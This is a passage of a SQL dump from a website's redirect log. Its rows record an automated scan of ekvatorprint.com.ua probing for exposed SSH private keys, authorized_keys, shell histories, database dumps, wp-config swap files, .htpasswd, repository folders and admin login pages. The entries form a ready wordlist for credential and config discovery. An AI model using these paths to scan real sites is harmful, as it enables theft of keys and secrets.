13:26:30','0000-00-00 00:00:00',301),(3932,'http://ekvatorprint.com.ua/.shrc',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3933,'http://ekvatorprint.com.ua/.sh_history',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3934,'http://ekvatorprint.com.ua/.smushit-status',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3935,'http://ekvatorprint.com.ua/.sln',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3936,'http://ekvatorprint.com.ua/.smileys/',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3937,'http://ekvatorprint.com.ua/.spamassassin',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3938,'http://ekvatorprint.com.ua/.sql',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3939,'http://ekvatorprint.com.ua/.sql.bz2',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3940,'http://ekvatorprint.com.ua/.sql.gz',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3941,'http://ekvatorprint.com.ua/.sqlite_history',NULL,'','',3,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3942,'http://ekvatorprint.com.ua/.ssh',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3943,'http://ekvatorprint.com.ua/.ssh/authorized_keys',NULL,'','',2,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3944,'http://ekvatorprint.com.ua/.ssh/',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3945,'http://ekvatorprint.com.ua/.ssh.php',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3946,'http://ekvatorprint.com.ua/.ssh/id_rsa',NULL,'','',15,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3947,'http://ekvatorprint.com.ua/.ssh.asp',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3948,'http://ekvatorprint.com.ua/.ssh/id_rsa.key',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3949,'http://ekvatorprint.com.ua/.ssh/id_rsa.key~',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3950,'http://ekvatorprint.com.ua/.ssh/id_rsa.priv',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3951,'http://ekvatorprint.com.ua/.ssh/id_rsa.priv~',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3952,'http://ekvatorprint.com.ua/.ssh/id_rsa.pub~',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3953,'http://ekvatorprint.com.ua/.ssh/id_rsa.pub',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3954,'http://ekvatorprint.com.ua/.ssh/know_hosts',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3955,'http://ekvatorprint.com.ua/.ssh/known_host',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3956,'http://ekvatorprint.com.ua/.ssh/id_rsa~',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3957,'http://ekvatorprint.com.ua/.ssh/know_hosts~',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3958,'http://ekvatorprint.com.ua/.st_cache/',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3959,'http://ekvatorprint.com.ua/.stats/',NULL,'','',1,0,'2017-01-20 13:26:30','0000-00-00 00:00:00',301),(3960,'http://ekvatorprint.com.ua/.sublime-gulp.cache',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3961,'http://ekvatorprint.com.ua/.sublime-workspace',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3962,'http://ekvatorprint.com.ua/.sublime-project',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3963,'http://ekvatorprint.com.ua/.sucuriquarantine/',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3964,'http://ekvatorprint.com.ua/.subversion',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3965,'http://ekvatorprint.com.ua/.sunw',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3966,'http://ekvatorprint.com.ua/.svn',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3967,'http://ekvatorprint.com.ua/.svn/all-wcprops',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3968,'http://ekvatorprint.com.ua/.svn/',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3969,'http://ekvatorprint.com.ua/.svn/pristine/',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3970,'http://ekvatorprint.com.ua/.svn/prop-base/',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3971,'http://ekvatorprint.com.ua/.svn/text-base/',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3972,'http://ekvatorprint.com.ua/.svn/tmp/',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3973,'http://ekvatorprint.com.ua/.svnignore',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3974,'http://ekvatorprint.com.ua/.sw',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3975,'http://ekvatorprint.com.ua/.swp',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3976,'http://ekvatorprint.com.ua/.swo',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3977,'http://ekvatorprint.com.ua/.synthquota',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3978,'http://ekvatorprint.com.ua/.swf',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3979,'http://ekvatorprint.com.ua/.system/',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3980,'http://ekvatorprint.com.ua/.tags',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3981,'http://ekvatorprint.com.ua/.tar',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3982,'http://ekvatorprint.com.ua/.tags_sorted_by_file',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3983,'http://ekvatorprint.com.ua/.tar.bz2',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3984,'http://ekvatorprint.com.ua/.tar.gz',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3985,'http://ekvatorprint.com.ua/.temp',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3986,'http://ekvatorprint.com.ua/.tgitconfig',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3987,'http://ekvatorprint.com.ua/.thumbs',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3988,'http://ekvatorprint.com.ua/.tmp',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3989,'http://ekvatorprint.com.ua/.tmproj',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3990,'http://ekvatorprint.com.ua/.transients_purge.log',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3991,'http://ekvatorprint.com.ua/.tox',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3992,'http://ekvatorprint.com.ua/.travis.yml',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3993,'http://ekvatorprint.com.ua/.tx/',NULL,'','',1,0,'2017-01-20 13:26:31','0000-00-00 00:00:00',301),(3994,'http://ekvatorprint.com.ua/.vagrant',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(3995,'http://ekvatorprint.com.ua/.vacation.cache',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(3996,'http://ekvatorprint.com.ua/.version',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(3997,'http://ekvatorprint.com.ua/.vimrc',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(3998,'http://ekvatorprint.com.ua/.user.ini',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(3999,'http://ekvatorprint.com.ua/.viminfo',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4000,'http://ekvatorprint.com.ua/.vgextensions/',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4001,'http://ekvatorprint.com.ua/.web',NULL,'','',2,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4002,'http://ekvatorprint.com.ua/.well-known/acme-challenge/',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4003,'http://ekvatorprint.com.ua/.svn/props/',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4004,'http://ekvatorprint.com.ua/.well-known/',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4005,'http://ekvatorprint.com.ua/.zeus.sock',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4006,'http://ekvatorprint.com.ua/.wp-config.php.swp',NULL,'','',2,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4007,'http://ekvatorprint.com.ua/.wwwacl',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4008,'http://ekvatorprint.com.ua/.www_acl',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4009,'http://ekvatorprint.com.ua/.zfs/',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4010,'http://ekvatorprint.com.ua/.zip',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4011,'http://ekvatorprint.com.ua/0.htpasswd',NULL,'','',1,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4012,'http://ekvatorprint.com.ua/0.php',NULL,'','',2,0,'2017-01-20 13:26:32','0000-00-00 00:00:00',301),(4013,'http://ekvatorprint.com.ua/00',NULL,'','',1,0,'2017-01-20 13:26:33','0000-00-00 00:00:00',301),(4014,'http://ekvatorprint.com.ua/.well-known/dnt-policy.txt',NULL,'','',1,0,'2017-01-20 13:26:33','0000-00-00 00:00:00',301),(4015,'http://ekvatorprint.com.ua/.workspace/',NULL,'','',1,0,'2017-01-20 13:26:33','0000-00-00 00:00:00',301),(4016,'http://ekvatorprint.com.ua/123.php',NULL,'','',1,0,'2017-01-20 13:26:34','0000-00-00 00:00:00',301),(4017,'http://ekvatorprint.com.ua/123.txt',NULL,'','',1,0,'2017-01-20 13:26:34','0000-00-00 00:00:00',301),(4018,'http://ekvatorprint.com.ua/1999',NULL,'','',1,0,'2017-01-20 13:26:34','0000-00-00 00:00:00',301),(4019,'http://ekvatorprint.com.ua/16',NULL,'','',1,0,'2017-01-20 13:26:34','0000-00-00 00:00:00',301),(4020,'http://ekvatorprint.com.ua/2000',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4021,'http://ekvatorprint.com.ua/2001',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4022,'http://ekvatorprint.com.ua/2004',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4023,'http://ekvatorprint.com.ua/2003',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4024,'http://ekvatorprint.com.ua/2007',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4025,'http://ekvatorprint.com.ua/2002',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4026,'http://ekvatorprint.com.ua/2008',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4027,'http://ekvatorprint.com.ua/2006',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4028,'http://ekvatorprint.com.ua/2011',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4029,'http://ekvatorprint.com.ua/2009',NULL,'','',1,0,'2017-01-20 13:26:35','0000-00-00 00:00:00',301),(4030,'http://ekvatorprint.com.ua/2010',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4031,'http://ekvatorprint.com.ua/2012',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4032,'http://ekvatorprint.com.ua/2013',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4033,'http://ekvatorprint.com.ua/2257.php',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4034,'http://ekvatorprint.com.ua/2257.',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4035,'http://ekvatorprint.com.ua/24',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4036,'http://ekvatorprint.com.ua/28',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4037,'http://ekvatorprint.com.ua/35',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4038,'http://ekvatorprint.com.ua/34',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4039,'http://ekvatorprint.com.ua/2005',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4040,'http://ekvatorprint.com.ua/33',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4041,'http://ekvatorprint.com.ua/32',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4042,'http://ekvatorprint.com.ua/37',NULL,'','',1,0,'2017-01-20 13:26:36','0000-00-00 00:00:00',301),(4043,'http://ekvatorprint.com.ua/36',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4044,'http://ekvatorprint.com.ua/39',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4045,'http://ekvatorprint.com.ua/38',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4046,'http://ekvatorprint.com.ua/42',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4047,'http://ekvatorprint.com.ua/404',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4048,'http://ekvatorprint.com.ua/40',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4049,'http://ekvatorprint.com.ua/44',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4050,'http://ekvatorprint.com.ua/43',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4051,'http://ekvatorprint.com.ua/48',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4052,'http://ekvatorprint.com.ua/49',NULL,'','',1,0,'2017-01-20 13:26:37','0000-00-00 00:00:00',301),(4053,'http://ekvatorprint.com.ua/46',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4054,'http://ekvatorprint.com.ua/45',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4055,'http://ekvatorprint.com.ua/47',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4056,'http://ekvatorprint.com.ua/50',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4057,'http://ekvatorprint.com.ua/52',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4058,'http://ekvatorprint.com.ua/53',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4059,'http://ekvatorprint.com.ua/57',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4060,'http://ekvatorprint.com.ua/51',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4061,'http://ekvatorprint.com.ua/54',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4062,'http://ekvatorprint.com.ua/55',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4063,'http://ekvatorprint.com.ua/59',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4064,'http://ekvatorprint.com.ua/56',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4065,'http://ekvatorprint.com.ua/58',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4066,'http://ekvatorprint.com.ua/60',NULL,'','',1,0,'2017-01-20 13:26:38','0000-00-00 00:00:00',301),(4067,'http://ekvatorprint.com.ua/61',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4068,'http://ekvatorprint.com.ua/64',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4069,'http://ekvatorprint.com.ua/63',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4070,'http://ekvatorprint.com.ua/62',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4071,'http://ekvatorprint.com.ua/66',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4072,'http://ekvatorprint.com.ua/65',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4073,'http://ekvatorprint.com.ua/911admin',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4074,'http://ekvatorprint.com.ua/70',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4075,'http://ekvatorprint.com.ua/97',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4076,'http://ekvatorprint.com.ua/96',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4077,'http://ekvatorprint.com.ua/ASPSamp/AdvWorks/equipment/catalog_type.php',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4078,'http://ekvatorprint.com.ua/ADMIN',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4079,'http://ekvatorprint.com.ua/@',NULL,'','',1,0,'2017-01-20 13:26:39','0000-00-00 00:00:00',301),(4080,'http://ekvatorprint.com.ua/ASPSamp/AdvWorks/equipment/catalog_type.',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4081,'http://ekvatorprint.com.ua/AccessDenied.php',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4082,'http://ekvatorprint.com.ua/APP',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4083,'http://ekvatorprint.com.ua/AccessPlatform/auth/clientscripts/',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4084,'http://ekvatorprint.com.ua/AccessPlatform/auth/clientscripts/cookies.js',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4085,'http://ekvatorprint.com.ua/AccessPlatform/auth/',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4086,'http://ekvatorprint.com.ua/AccessDenied.',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4087,'http://ekvatorprint.com.ua/Accounts/',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4088,'http://ekvatorprint.com.ua/ActiveDirectoryRemoteAdminScripts/',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4089,'http://ekvatorprint.com.ua/AccessPlatform/',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4090,'http://ekvatorprint.com.ua/Account/',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4091,'http://ekvatorprint.com.ua/AccessPlatform/auth/clientscripts/login.js',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4092,'http://ekvatorprint.com.ua/AddressBookW2JE/services/AddressBook',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4093,'http://ekvatorprint.com.ua/AddressBookJ2WB',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4094,'http://ekvatorprint.com.ua/AddressBookJ2WE/services/AddressBook',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4095,'http://ekvatorprint.com.ua/Adm.php',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4096,'http://ekvatorprint.com.ua/AddressBookW2JB',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4097,'http://ekvatorprint.com.ua/AddressBookW2JE/services/AddressBook/wsdl/',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4098,'http://ekvatorprint.com.ua/AddressBookJ2WE/services/AddressBook/wsdl/',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4099,'http://ekvatorprint.com.ua/Adm.cgi',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4100,'http://ekvatorprint.com.ua/Adm.',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4101,'http://ekvatorprint.com.ua/Adm.htm',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4102,'http://ekvatorprint.com.ua/Adm.pl',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4103,'http://ekvatorprint.com.ua/Adm.html',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4104,'http://ekvatorprint.com.ua/Adm.jsp',NULL,'','',1,0,'2017-01-20 13:26:40','0000-00-00 00:00:00',301),(4105,'http://ekvatorprint.com.ua/Adm.shtml',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4106,'http://ekvatorprint.com.ua/Admin.php',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4107,'http://ekvatorprint.com.ua/Adm/',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4108,'http://ekvatorprint.com.ua/Adm.py',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4109,'http://ekvatorprint.com.ua/Admin.',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4110,'http://ekvatorprint.com.ua/Admin',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4111,'http://ekvatorprint.com.ua/Adm.rb',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4112,'http://ekvatorprint.com.ua/Admin.exe',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4113,'http://ekvatorprint.com.ua/Admin.htm',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4114,'http://ekvatorprint.com.ua/Admin.cgi',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4115,'http://ekvatorprint.com.ua/Admin.html',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4116,'http://ekvatorprint.com.ua/Admin.pl',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4117,'http://ekvatorprint.com.ua/Admin.jsp',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4118,'http://ekvatorprint.com.ua/Admin/knowledge/dsmgr/users/GroupManager.php',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4119,'http://ekvatorprint.com.ua/Admin/knowledge/dsmgr/users/GroupManager.',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4120,'http://ekvatorprint.com.ua/Admin.shtml',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4121,'http://ekvatorprint.com.ua/Admin.rb',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4122,'http://ekvatorprint.com.ua/Admin.py',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4123,'http://ekvatorprint.com.ua/Admin/knowledge/dsmgr/users/UserManager.php',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4124,'http://ekvatorprint.com.ua/Admin/knowledge/dsmgr/users/UserManager.',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4125,'http://ekvatorprint.com.ua/AdminJDBC',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4126,'http://ekvatorprint.com.ua/AdminEvents',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4127,'http://ekvatorprint.com.ua/AdminConnections',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4128,'http://ekvatorprint.com.ua/Admin/login.',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4129,'http://ekvatorprint.com.ua/Admin/login.php',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4130,'http://ekvatorprint.com.ua/Admin/login/',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4131,'http://ekvatorprint.com.ua/AdminCaptureRootCA',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4132,'http://ekvatorprint.com.ua/AdminClients',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4133,'http://ekvatorprint.com.ua/AdminLicense',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4134,'http://ekvatorprint.com.ua/AdminProps',NULL,'','',1,0,'2017-01-20 13:26:41','0000-00-00 00:00:00',301),(4135,'http://ekvatorprint.com.ua/AdminThreads',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4136,'http://ekvatorprint.com.ua/AdminVersion',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4137,'http://ekvatorprint.com.ua/Administracao.php',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4138,'http://ekvatorprint.com.ua/AdminRealm',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4139,'http://ekvatorprint.com.ua/Administrateur.php',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4140,'http://ekvatorprint.com.ua/Administracion.php',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4141,'http://ekvatorprint.com.ua/Administracion.',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4142,'http://ekvatorprint.com.ua/Administracao.',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4143,'http://ekvatorprint.com.ua/Administrateur.',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4144,'http://ekvatorprint.com.ua/Administration.',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4145,'http://ekvatorprint.com.ua/Administration.shtml',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4146,'http://ekvatorprint.com.ua/Administration.php',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4147,'http://ekvatorprint.com.ua/Administrator',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4148,'http://ekvatorprint.com.ua/Administrator.',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4149,'http://ekvatorprint.com.ua/Administration.html',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4150,'http://ekvatorprint.com.ua/Administrator.htm',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4151,'http://ekvatorprint.com.ua/Administrator.html',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4152,'http://ekvatorprint.com.ua/Administrator.php',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4153,'http://ekvatorprint.com.ua/Administrator/',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4154,'http://ekvatorprint.com.ua/AdvWorks/equipment/catalog_type.php',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4155,'http://ekvatorprint.com.ua/Administrator/login',NULL,'','',1,0,'2017-01-20 